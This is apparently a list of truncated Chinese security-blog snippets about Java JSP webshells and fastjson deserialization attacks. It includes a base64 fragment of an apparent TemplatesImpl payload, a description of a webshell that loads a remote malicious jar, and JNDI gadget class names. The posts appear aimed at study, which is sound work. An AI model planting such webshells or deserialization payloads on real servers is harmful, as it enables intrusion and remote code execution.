1. add: Rumtime.exec的JSP Webshell 和 利用TemplatesImpl反序列化...FyhMamF2YS9uaW8vZmlsZS9QYXRoOylWAQAIZ2V0Qnl0ZXMBAAQoKVtCAQAFd3JpdGUBAEcoTGphdmEvbmlvL2ZpbGUvUGF0aDtbQltMamF2YS9uaW8vZmlsZS9PcGVuT3B0aW9uOylMamF2YS9uaW8vZmlsZS9QYXRoOwEAD3ByaW50U3RhY2tUcmFjZQAhACUAJgAAA...
2. 从零开始学习fastjson反序列化 -com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesIpl和com.sun.rowset.JdbcRowSetImpl都加入了黑名单中,oracle.jdbc.connector.OracleManagedConnectionFactory是新挖掘到的JNDI Gadget,原理和com.sun.rowset.JdbcRowSetImpl类似,就...
3. 都0202年了老嗨还在用的 - 各种姿势jsp webshell -这个jsp webshell使用了URLClassLoader加载远程恶意jar,在loadClass时触发恶意代码执行,这种方式的Webshell,如果遇到了限制出网的情况,可能就没用了。 import java.io.BufferedReader; import java.io.IOException; import java.io.InputStrea...
4. FastJSON反序列化学习 -SerializerFeature.WriteClassName是JSON.toJSONString()中的一个设置属性值,设置之后在序列化的时候会多写入一个@type,即写上被序列化的类名,type可以指定反序列化的类,并且调用其getter/setter/is方法,而问题恰恰出现在了这个特性,我们...